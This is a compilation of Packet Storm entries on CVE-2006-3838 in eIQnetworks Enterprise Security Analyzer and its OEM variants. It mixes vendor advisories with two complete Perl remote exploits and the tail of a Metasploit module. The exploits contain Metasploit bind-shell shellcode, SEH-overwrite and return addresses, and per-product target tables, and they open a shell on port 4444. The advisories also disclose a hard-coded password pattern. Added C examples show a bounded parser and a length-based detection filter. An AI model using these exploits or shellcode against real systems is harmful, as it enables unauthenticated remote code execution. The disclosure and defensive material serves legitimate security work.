		filler =  rand_text_english(1) * (target['Offset'] - payload.encoded.length)
		sploit =  "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') +  "&";

		sock.put(sploit)

		handler
		disconnect	
	end

end
    

- Vulnerability information (F49114)

TSRT-06-07.txt (PacketStormID:F49114)
2006-08-18 00:00:00
Pedram Amini  zerodayinitiative.com
advisory,remote,arbitrary,vulnerability
CVE-2006-3838

The eIQnetworks Enterprise Security Analyzer suffers from multiple vulnerabilities that allow remote attackers the ability to execute arbitrary code.

TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent
            Buffer Overflow Vulnerabilities

http://www.tippingpoint.com/security/advisories/TSRT-06-07.html
August 8, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
Enterprise Security Analyzer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since July 31, 2006 by Digital Vaccine protection
filter ID 4386. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
These vulnerabilities allow remote attackers to execute arbitrary code
on vulnerable installations of eIQnetworks Enterprise Security
Analyzer. Authentication is not required to exploit these
vulnerabilities.

The first flaw specifically exists within the routines responsible for
handling user-supplied data on TCP port 9999 within Monitoring.exe.
Upon connecting to this port the user is immediately prompted for a
password. A custom string comparison loop is used to validate the
supplied password against the hard-coded value "eiq2esa?", where the
question mark represents any alpha-numeric character. Issuing the
command "HELP" reveals a number of documented commands:

   ---------------------------------------------------------
   Usage:
   QUERYMONITOR: to fetch events for a particular monitor
           QUERYMONITOR&<user>&<monid>&timer
   QUERYEVENTCOUNT or QEC: to get latest event counts
   RESETEVENTCOUNT or REC: to reset event counts
           REC&[ALL] or REC&dev1,dev2,
   STATUS: Display the running status of all the threads
   TRACE:  TRACE&ip or hostname&.  TRACE&OFF& will turn off the trace
   FLUSH: reset monitors as though the hour has changed
   ALRT-OFF and ALRT-ON: toggle the life of alerts-thread.
   RECV-OFF and RECV-ON: toggle the life of event-collection thread.
   EM-OFF and EM-ON toggle event manager
   DMON-OFF and DMON-ON toggle device event monitoring
   HMON-OFF and HMON-ON toggle host event monitoring
   NFMON-OFF and NFMON-ON toggle netflow event monitoring
   HPMON-OFF and HPMON-ON toggle host perf monitoring
   X or EXIT: to close the session
   ---------------------------------------------------------

Supplying a long string to the TRACE command results in an overflow of
the global variable at 0x004B1788. A neighboring global variable, 116
bytes after the overflowed variable, contains a file output stream
pointer that is written to every 30 seconds by a garbage collection
thread. The log message can be influenced and therefore this is a valid
exploit vector, albeit complicated. A trivial exploit vector exists
within the parsing of the actual command at the following equivalent
API call:

    sscanf(socket_data, "%[^&]&%[^&]&", 60_byte_stack_var, global_var);

Because no explicit check is made for the exact command "TRACE", an
attacker can abuse this call to sscanf by passing a long suffix to the
TRACE command that is free of the field terminating character, '&'.
This vector is trivial to exploit.

The second flaw specifically exists within the routines responsible for
handling user-supplied data on TCP port 10626 within Monitoring.exe. The
service will accept up to approximately 16K of data from unauthenticated
clients which is later parsed, in a similar fashion to above, in search
of the delimiting character '&'. Various trivial vectors of
exploitation exist, for example, through the QUERYMONITOR command.
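Both Monitoring.exe flaws above have the same root cause: a field is copied up to the '&' delimiter with no width limit, and the leading command is never matched exactly before the copy. The following is an added example, not code from the advisory or from eIQnetworks, of a bounded parser for the same `CMD&ARG&...&` layout. A field is refused outright (not truncated) when its terminator is missing or it would not fit its buffer, and the command is looked up exactly in a table before any argument is copied. The command table, the 16-byte command buffer, `MAX_ARGS`, and the assumption that every argument, including the last, ends in '&' are illustrative choices rather than protocol facts from the page; only the 60-byte argument size comes from the advisory.

```c
#include <stdio.h>
#include <string.h>

#define CMD_MAX  16   /* assumed: longest accepted command name plus NUL */
#define ARG_MAX  60   /* the 60-byte stack buffer named in the advisory */
#define MAX_ARGS 3    /* assumed upper bound on arguments per command */

enum parse_result { PARSE_OK = 0, PARSE_BAD_FORMAT = 1, PARSE_UNKNOWN_CMD = 2 };

/* Command table (assumed from the HELP output above): name and argument count. */
struct cmd_spec { const char *name; int nargs; };
static const struct cmd_spec COMMANDS[] = {
    { "TRACE",        1 },   /* TRACE&ip or hostname& */
    { "QUERYMONITOR", 3 },   /* QUERYMONITOR&<user>&<monid>&timer& */
};

/* Copy one '&'-terminated field from *src into dst (capacity dstsz) and
 * advance *src past the terminator. Returns the field length, or -1 when
 * the terminator is missing, the field is empty, or the field plus NUL
 * would not fit. Refusing instead of truncating means an over-long or
 * unterminated field can never spill past dst. */
static int copy_field(const char **src, char *dst, size_t dstsz)
{
    const char *amp = strchr(*src, '&');
    if (amp == NULL) return -1;
    size_t len = (size_t)(amp - *src);
    if (len == 0 || len >= dstsz) return -1;
    memcpy(dst, *src, len);
    dst[len] = '\0';
    *src = amp + 1;
    return (int)len;
}

/* Parse "CMD&ARG1&...&ARGn&" into args. The command is matched exactly
 * against the table before any argument is copied, so a known name with a
 * long suffix is rejected instead of being accepted as a prefix match. */
int parse_request(const char *data, char args[MAX_ARGS][ARG_MAX], int *nargs)
{
    char cmd[CMD_MAX];
    const char *p = data;
    const struct cmd_spec *spec = NULL;

    if (copy_field(&p, cmd, sizeof cmd) < 0) return PARSE_BAD_FORMAT;
    for (size_t i = 0; i < sizeof COMMANDS / sizeof COMMANDS[0]; i++) {
        if (strcmp(cmd, COMMANDS[i].name) == 0) { spec = &COMMANDS[i]; break; }
    }
    if (spec == NULL) return PARSE_UNKNOWN_CMD;
    for (int i = 0; i < spec->nargs; i++) {
        if (copy_field(&p, args[i], ARG_MAX) < 0) return PARSE_BAD_FORMAT;
    }
    *nargs = spec->nargs;
    return PARSE_OK;
}

/* Convenience wrapper returning only the verdict for one request string. */
int classify_request(const char *data)
{
    char args[MAX_ARGS][ARG_MAX];
    int n = 0;
    return parse_request(data, args, &n);
}

int main(void)
{
    /* Constructed sample requests; the last is "TRACE" followed by 100 'A'
     * characters and no '&' at all, the shape the advisory describes. */
    char longcmd[128];
    memcpy(longcmd, "TRACE", 5);
    memset(longcmd + 5, 'A', 100);
    longcmd[105] = '\0';

    const char *samples[] = { "TRACE&10.0.0.1&", "QUERYMONITOR&admin&7&timer&",
                              "STATUS&", longcmd };
    for (size_t i = 0; i < 4; i++)
        printf("%-28.28s -> %d\n", samples[i], classify_request(samples[i]));
    return 0;
}
```

Result codes: 0 is a well-formed request for a known command, 1 is a malformed or over-long field, 2 is an unknown command. A caller should log and drop on 1 and 2 rather than trying to salvage the request.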

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

    http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.31 - Digital Vaccine released to TippingPoint customers
2006.08.08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Pedram Amini, TippingPoint Security
Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:

    http://www.tippingpoint.com/security
 
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service.
    

- Vulnerability Information (F48651)

eIQ-ESA.txt (PacketStormID:F48651)
2006-07-28 00:00:00
Kevin Finisterre  digitalmunition.com
exploit,remote,tcp
CVE-2006-3838

Remote exploit for the Syslog server by eIQnetworks that has a vulnerability when processing long strings transmitted to its TCP port.

#!/usr/bin/perl -w
# 
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by KF of digitalmunition.com.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
#
# Exploit for * Syslog Server by eiQnetworks  (OEM for Several vendors)
#
# There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default
#
# Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style jmp instead of a 
# forward jump. This would eliminate the need for 2 stages of shellcode. .  
#
#SEH chain of thread 00000FF4
#Address    SE handler
#013ECEF8   FWASyslo.00449EDB
#013EFF78   WS2HELP.71AA15CF   <-------- I set this address. 
#
#013EFF74   90909090
#013EFF78   909032EB  Pointer to next SEH record  <--- I set this. 
#013EFF7C   71AA15CF  SE handler   <--- pop pop ret 
#013EFF80   90909090
#
#71AA15CF   5F               POP EDI
#71AA15D0   5D               POP EBP
#71AA15D1   C2 0800          RETN 8
#
# View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode.
#
use IO::Socket;

$bufsize = 4096; 

$hostname = "127.0.0.1";
$nextserec = pack("l", (0xEB069090)); # jmp short +0x06
$sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn - ws2help.dll  (Send this reversed note the 'V')

# Binary hunts performed by JxT and Titon
$tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite. 

unless (($target,$hostname) = @ARGV,$hostname) {

        print "\n        Syslog by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
        print "\n\nUsage: $0 <target> <host>\n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}


($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n";

# Stage 2 shellcode can be up to Length of SEH overwrite. 
$sc2 = 
# win32_bind -  EXITFUNC=seh LPORT=4444 
# Size=344 Encoder=PexFnstenvSub http://metasploit.com
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2".
"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3".
"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7".
"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5".
"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04".
"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7".
"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7".
"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c".
"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc".
"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e".
"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f".
"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd".
"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44".
"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65".
"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b".
"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c".
"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01".
"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3".
"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d".
"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc".
"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73".
"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c";

# Stage 1 shellcode can only be 128 bytes. 
# 12 byte Nop find code by skylined?  This is bullshit right now... it does not hunt for the right shit. 
$sc1 = "\x5f\x54\x90\xb8\x90\x90\xfc\x90\xaf\xf2\xc3\x57";

# for XP SP1  
#  <nops> <stage 2 shellcode><jmp code> <pop pop ret> <nops> <128 byte or less stage 1 shellcode> 

# Should total 4096
$buf = "\x90" x ($b - length($sc2)) . $sc2 . $nextserec  . $sehandler . "\x90" x (128 - length($sc1)) . $sc1 . "\x58" x ($bufsize-$b-8-128);  

print "Exploiting $hostname\n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>12345, Type=>SOCK_STREAM);

$sock or die "no socket :$!\n"; 

print $sock "$buf";
close $sock;

    

- Vulnerability Information (F48650)

eIQ-LM-3.txt (PacketStormID:F48650)
2006-07-28 00:00:00
Kevin Finisterre  digitalmunition.com
exploit,remote,overflow
CVE-2006-3838

Remote exploit for the buffer overflow in the LICMGR_ADDLICENSE field of the eIQnetworks Network Security Analyzer.

#!/usr/bin/perl -w
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
#
# Exploit for * Security Analyzer by eiQnetworks  (OEM for Several vendors)
#
# kfinisterre@kfinisterre01:~$  ./eiQ_multi.pl 2 192.168.0.13
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting 192.168.0.13
# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
# Trying 192.168.0.13...
# Connected to 192.168.0.13.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Network Security Analyzer\fwa>exit
# exit
# Connection closed by foreign host.

use IO::Socket;
$hostname = "127.0.0.1";
$retval = 0x71ab773b; # jmp EBX on WinXP SP2 ws2_32.dll (metasploit)
#$retval = 0x750316e2; # call EBX on Windows 2000 SP4 ws2_32.dll (metasploit)

# Binary hunts performed by JxT and Titon
$tgts{"0"} = "G2SRv4.0.36.exe:1262";
$tgts{"1"} = "EnterpriseSecurityAnalyzerv21.exe:494";
$tgts{"2"} = "NetworkSecurityAnalyzerv4.2.27.exe:1262";
$tgts{"3"} = "NetworkSecurityAnalyzerv5.exe:1262";
$tgts{"4"} = "FortiReporter_4.2.26.exe:1262";
$tgts{"5"} = "AstaroReportManagerV37.exe:000";  # Unknown.. need serial
$tgts{"6"} = "AstaroReportManager_4.2.29.exe:1262";

unless (($target,$hostname) = @ARGV,$hostname) {

        print "\n        Security Analyzer by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n";
        print "\n\nUsage: $0 <target> <host>\n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Len: $b\n";

$sc = 
# win32_bind -  EXITFUNC=seh LPORT=4444 
# Size=344 Encoder=PexFnstenvSub http://metasploit.com
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2".
"\xfa\xa1\x2c\x83\xeb\xfc\xe2\xf4\x4e\x90\x4a\x61\x5a\x03\x5e\xd3".
"\x4d\x9a\x2a\x40\x96\xde\x2a\x69\x8e\x71\xdd\x29\xca\xfb\x4e\xa7".
"\xfd\xe2\x2a\x73\x92\xfb\x4a\x65\x39\xce\x2a\x2d\x5c\xcb\x61\xb5".
"\x1e\x7e\x61\x58\xb5\x3b\x6b\x21\xb3\x38\x4a\xd8\x89\xae\x85\x04".
"\xc7\x1f\x2a\x73\x96\xfb\x4a\x4a\x39\xf6\xea\xa7\xed\xe6\xa0\xc7".
"\xb1\xd6\x2a\xa5\xde\xde\xbd\x4d\x71\xcb\x7a\x48\x39\xb9\x91\xa7".
"\xf2\xf6\x2a\x5c\xae\x57\x2a\x6c\xba\xa4\xc9\xa2\xfc\xf4\x4d\x7c".
"\x4d\x2c\xc7\x7f\xd4\x92\x92\x1e\xda\x8d\xd2\x1e\xed\xae\x5e\xfc".
"\xda\x31\x4c\xd0\x89\xaa\x5e\xfa\xed\x73\x44\x4a\x33\x17\xa9\x2e".
"\xe7\x90\xa3\xd3\x62\x92\x78\x25\x47\x57\xf6\xd3\x64\xa9\xf2\x7f".
"\xe1\xa9\xe2\x7f\xf1\xa9\x5e\xfc\xd4\x92\xb0\x70\xd4\xa9\x28\xcd".
"\x27\x92\x05\x36\xc2\x3d\xf6\xd3\x64\x90\xb1\x7d\xe7\x05\x71\x44".
"\x16\x57\x8f\xc5\xe5\x05\x77\x7f\xe7\x05\x71\x44\x57\xb3\x27\x65".
"\xe5\x05\x77\x7c\xe6\xae\xf4\xd3\x62\x69\xc9\xcb\xcb\x3c\xd8\x7b".
"\x4d\x2c\xf4\xd3\x62\x9c\xcb\x48\xd4\x92\xc2\x41\x3b\x1f\xcb\x7c".
"\xeb\xd3\x6d\xa5\x55\x90\xe5\xa5\x50\xcb\x61\xdf\x18\x04\xe3\x01".
"\x4c\xb8\x8d\xbf\x3f\x80\x99\x87\x19\x51\xc9\x5e\x4c\x49\xb7\xd3".
"\xc7\xbe\x5e\xfa\xe9\xad\xf3\x7d\xe3\xab\xcb\x2d\xe3\xab\xf4\x7d".
"\x4d\x2a\xc9\x81\x6b\xff\x6f\x7f\x4d\x2c\xcb\xd3\x4d\xcd\x5e\xfc".
"\x39\xad\x5d\xaf\x76\x9e\x5e\xfa\xe0\x05\x71\x44\x42\x70\xa5\x73".
"\xe1\x05\x77\xd3\x62\xfa\xa1\x2c";

$nops = "A" x ($b - length($sc));
$buf = "LICMGR_ADDLICENSE&" . $nops . $sc . $ret . "&";

printf "Exploiting $hostname\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>10616, Type=>SOCK_STREAM);
$sock or die "no socket :$!\n"; 

print $sock "$buf";
print "Try connecting to port 4444 on the target.\n";
    

- Vulnerability Information (F48592)

TSRT-06-04.txt (PacketStormID:F48592)
2006-07-26 00:00:00

advisory,overflow,tcp
CVE-2006-3838

A vulnerability exists in the eIQnetworks Enterprise Security Analyzer. The specific flaw exists within Topology.exe, which binds by default to TCP port 10628. During the processing of long prefixes to the GUIADDDEVICE, ADDDEVICE, or DELETEDEVICE command, a stack based buffer overflow occurs.

TSRT-06-04: eIQnetworks Enterprise Security Analyzer Topology Server
            Buffer Overflow Vulnerability

http://www.zerodayinitiative.com/advisories/TSRT-06-04.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since July 24, 2006 by Digital Vaccine protection
filter ID 4500. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of eIQnetworks Enterprise Security Analyzer.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within Topology.exe, which binds by default to
TCP port 10628. During the processing of long prefixes to the
GUIADDDEVICE, ADDDEVICE, or DELETEDEVICE command, a stack based buffer
overflow occurs.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

    http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.24 - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, TippingPoint Security
Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:

    http://www.tippingpoint.com/security
 
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- Vulnerability Information (F48591)

TSRT-06-03.txt (PacketStormID:F48591)
2006-07-26 00:00:00

advisory,tcp
CVE-2006-3838

A vulnerability exists in the eIQnetworks Enterprise Security Analyzer. The flaw specifically exists within the Syslog daemon, syslogserver.exe, during the processing of long arguments passed through various commands on TCP port 10617.

TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server
            Buffer Overflow Vulnerabilities

http://www.zerodayinitiative.com/advisories/TSRT-06-03.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since July 24, 2006 by Digital Vaccine protection
filter ID 4319. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of eIQnetworks Enterprise Security Analyzer.
Authentication is not required to exploit this vulnerability.

The flaw specifically exists within the Syslog daemon,
syslogserver.exe, during the processing of long arguments passed
through various commands on TCP port 10617. The following commands are
known to be affected:

    DELTAINTERVAL
    LOGFOLDER
    DELETELOGS
    FWASERVER
    SYSLOGPUBLICIP
    GETFWAIMPORTLOG
    GETFWADELTA
    DELETERDEPDEVICE
    COMPRESSRAWLOGFILE
    GETSYSLOGFIREWALLS
    ADDPOLICY
    EDITPOLICY

The majority of the above cases result in a stack overflow and are
trivial to exploit.
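An added example, not from the advisory or from TippingPoint, of the kind of length-based check an IPS filter or a log reviewer could apply to requests captured on TCP port 10617: the leading field is matched exactly against the command list above, and the request is flagged if any '&'-delimited argument exceeds a threshold. The 256-byte threshold is an assumption (the advisory gives no buffer sizes; legitimate intervals, folder names and addresses are far shorter), the sample requests are constructed, and `flag_synthetic` exists only so the check can be exercised without captured traffic.

```c
#include <stdio.h>
#include <string.h>

/* Commands TSRT-06-03 lists as affected on syslogserver.exe's TCP port 10617. */
static const char *const AFFECTED_COMMANDS[] = {
    "DELTAINTERVAL", "LOGFOLDER", "DELETELOGS", "FWASERVER", "SYSLOGPUBLICIP",
    "GETFWAIMPORTLOG", "GETFWADELTA", "DELETERDEPDEVICE", "COMPRESSRAWLOGFILE",
    "GETSYSLOGFIREWALLS", "ADDPOLICY", "EDITPOLICY",
};
#define N_AFFECTED (sizeof AFFECTED_COMMANDS / sizeof AFFECTED_COMMANDS[0])

/* Any single '&'-delimited argument longer than this is treated as anomalous.
 * Assumed value: the advisory does not state the overflowed buffer sizes. */
#define ARG_LEN_THRESHOLD 256

/* Return 1 if the request starts with an affected command (exact match on
 * the leading field, so "ADDPOLICYX" does not count) and any following
 * argument is longer than ARG_LEN_THRESHOLD; 0 otherwise. Unterminated
 * trailing data is treated as one more argument. */
int flag_request(const char *req)
{
    const char *amp = strchr(req, '&');
    size_t cmdlen = amp ? (size_t)(amp - req) : strlen(req);
    int affected = 0;
    for (size_t i = 0; i < N_AFFECTED; i++) {
        if (strlen(AFFECTED_COMMANDS[i]) == cmdlen &&
            memcmp(AFFECTED_COMMANDS[i], req, cmdlen) == 0) { affected = 1; break; }
    }
    if (!affected || amp == NULL) return 0;

    const char *p = amp + 1;
    while (*p != '\0') {
        const char *next = strchr(p, '&');
        size_t len = next ? (size_t)(next - p) : strlen(p);
        if (len > ARG_LEN_THRESHOLD) return 1;
        if (next == NULL) break;
        p = next + 1;
    }
    return 0;
}

/* Test helper: build the constructed request "<cmd>&<arglen bytes of 'x'>&"
 * and return flag_request's verdict for it, or -1 if it would not fit. */
int flag_synthetic(const char *cmd, size_t arglen)
{
    char buf[1024];
    size_t cmdlen = strlen(cmd);
    if (cmdlen + arglen + 3 > sizeof buf) return -1;
    memcpy(buf, cmd, cmdlen);
    buf[cmdlen] = '&';
    memset(buf + cmdlen + 1, 'x', arglen);
    buf[cmdlen + 1 + arglen] = '&';
    buf[cmdlen + 2 + arglen] = '\0';
    return flag_request(buf);
}

/* Count how many requests in a captured batch are flagged. */
int count_flagged(const char *const *reqs, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) hits += flag_request(reqs[i]);
    return hits;
}

int main(void)
{
    /* Constructed benign traffic: short arguments, one unrelated command. */
    const char *samples[] = { "DELTAINTERVAL&30&", "LOGFOLDER&C:\\logs&", "STATUS&" };
    printf("flagged in benign samples: %d\n", count_flagged(samples, 3));
    printf("ADDPOLICY with 300-byte argument: %d\n", flag_synthetic("ADDPOLICY", 300));
    return 0;
}
```

The exact-match on the leading field matters for precision: a signature that only looks for the command name as a prefix would also fire on unrelated commands that happen to share it, while a threshold on every argument, not just the first, covers multi-argument commands such as ADDPOLICY and EDITPOLICY.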

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

    http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.24 - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, TippingPoint Security
Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:

    http://www.tippingpoint.com/security
 
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service.

    

- Vulnerability Information (F48586)

Zero Day Initiative Advisory 06-024 (PacketStormID:F48586)
2006-07-26 00:00:00
Tipping Point  zerodayinitiative.com
advisory,overflow,tcp
CVE-2006-3838

A vulnerability exists in the eIQnetworks Enterprise Security Analyzer. The specific flaw exists within EnterpriseSecurityAnalyzer.exe, which binds by default to TCP port 10616. During the processing of long arguments to the LICMGR_ADDLICENSE command a stack based buffer overflow occurs.

ZDI-06-024: eIQnetworks Enterprise Security Analyzer License Manager 
Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since July 24, 2006 by Digital Vaccine protection
filter ID 4318. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of eIQnetworks Enterprise Security Analyzer.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within EnterpriseSecurityAnalyzer.exe, which
binds by default to TCP port 10616. During the processing of long
arguments to the LICMGR_ADDLICENSE command a stack based buffer
overflow occurs.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

    http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.24 - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Titon, JxT, KF and the rest of 
Bastard Labs.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.

    

- Vulnerability Information (F48585)

Zero Day Initiative Advisory 06-023 (PacketStormID:F48585)
2006-07-26 00:00:00
Tipping Point  zerodayinitiative.com
advisory,udp,tcp
CVE-2006-3838

